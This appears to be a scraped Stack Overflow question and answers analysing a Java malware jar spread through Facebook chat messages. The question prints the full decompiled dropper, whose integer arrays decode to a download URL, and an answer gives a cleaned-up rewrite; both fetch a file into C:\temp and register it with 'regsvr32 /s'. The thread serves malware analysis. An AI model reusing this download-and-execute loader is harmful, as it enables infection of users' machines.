Question
I have got this message two times in facebook quoting " lol abc.rar" , the abc.rar file has an executable jar file which once clicked tries to connect to facebook and enters the same message to another chat randomly. I decompiled it using jd gui 0.36 and found a class czjffdqozxffyhrq inside this malware/virus,there is also a manifest file inside it.I tried virus total but it gives no results. This is surely a threat as it has come to me from two facebook friends of mine, who are unrelated to each other ,so it's spreading very fast virus total result: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/
Now the code of class:-package com.cakes;
https://stackoverflow.com/questions/22970503
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russianimport java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
public class czjffdqozxffyhrq
{
public static String mrdbdgwortilmglt()
{
int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };
StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
}
return cfmbxqxdanzahnu.toString();
}
public static String olzezeaokmr()
{
int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
for (int i = 0; i < wwlytwss.length; i++) {
uurwhymtb.append((char)wwlytwss[i]);
}
return uurwhymtb.toString();
}
public static String wxujpwlzjfvvc()
{
int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };
StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
for (int i = 0; i < krihniioygdowfq.length; i++) {
dmpxcpok.append((char)krihniioygdowfq[i]);
}
return dmpxcpok.toString();
}
public static String uwqeeyesndtlyfye()
{
int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
for (int i = 0; i < wwlytwsspath.length; i++) {
eiljiba.append((char)wwlytwsspath[i]);
}
return eiljiba.toString();
}
public static void bnyikewbdrqhetgb()
throws IOException
{
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(uwqeeyesndtlyfye());
m++;
}
}
public static void main(String[] args)
throws Exception
{
new File(wxujpwlzjfvvc()).mkdir();
File u = new File(olzezeaokmr());
if (u.exists())
{
bnyikewbdrqhetgb();
}
else
{
String pdisodea = mrdbdgwortilmglt();
String lwpztudm = olzezeaokmr();
lslmzhpvu(pdisodea, lwpztudm);
}
}
public static void lslmzhpvu(String rklnt, String nenyy)
throws IOException
{
URL hsnmxltpgt = new URL(rklnt);
InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
OutputStream uxvkcl = new FileOutputStream(nenyy);
byte[] b = new byte[432101];
int length;
while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
{
int length;
uxvkcl.write(b, 0, length);
}
mlzfltpyqeoqdahzvel.close();
uxvkcl.close();
bnyikewbdrqhetgb();
}
}
Can someone please explain how this is working and why is it still not detectable?
Solution
Basically it downloads a file from;
http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1
(obfuscated link, don't want anyone downloading it by mistake)
...to c:\temp and registers it in the system using;
regsvr32 /s <filename>
The real evil is probably in the downloaded file (which I'm not going to download :) )
OTHER TIPS
This is a pretty trivial attempt at obfuscation.
The methods:
mrdbdgwortilmgltolzezeaokmrwxujpwlzjfvvcuwqeeyesndtlyfyeare just Strings hidden as arrays of ints.
bnyikewbdrqhetgb is clearly naughty, since it's calling Runtime.getRuntime().exec... that should always be a warning sign in code.
lslmzhpvu is accessing a URL... also naughty.
By "naughty", here, I mean it's code that reaching outside of itself and so, potentially, doing harm elsewhere. In code that you've downloaded, that should be a major warning sign, unless you know that the code should be doing stuff with URLs or executing external programs.
It is catching it. It detects the unauthorized attempt to access a URL and warns you.
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
public class czjffdqozxffyhrq
{
public static String getDropBoxURL() {
// This URL has been bowdlerized to protect the dangerously curious
return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
}
public static String getTempFile() {
return "C:\\temp\\qvsfccjm.gtj";
}
public static String getTempDir() {
return "C:\\temp\\";
}
public static String getRegisterCommand() {
return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
}
public static void registerControlSixTimes() throws IOException {
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(getRegisterCommand());
m++;
}
}
public static void main(String[] args) throws Exception {
new File(getTempDir()).mkdir();
File u = new File(getTempFile());
if (u.exists())
{
registerControlSixTimes();
}
else
{
String dbURL = getDropBoxURL();
String tempFileName = getTempFile();
downloadFromURLToFile(dbURL, tempFileName);
}
}
public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
URL url = new URL(urlString);
InputStream in = url.openStream();
OutputStream out = new FileOutputStream(fileName);
byte[] b = new byte[432101];
int length;
while ((length = in.read(b)) != -1) {
int length;
out.write(b, 0, length);
}
in.close();
out.close();
registerControlSixTimes();
}
}
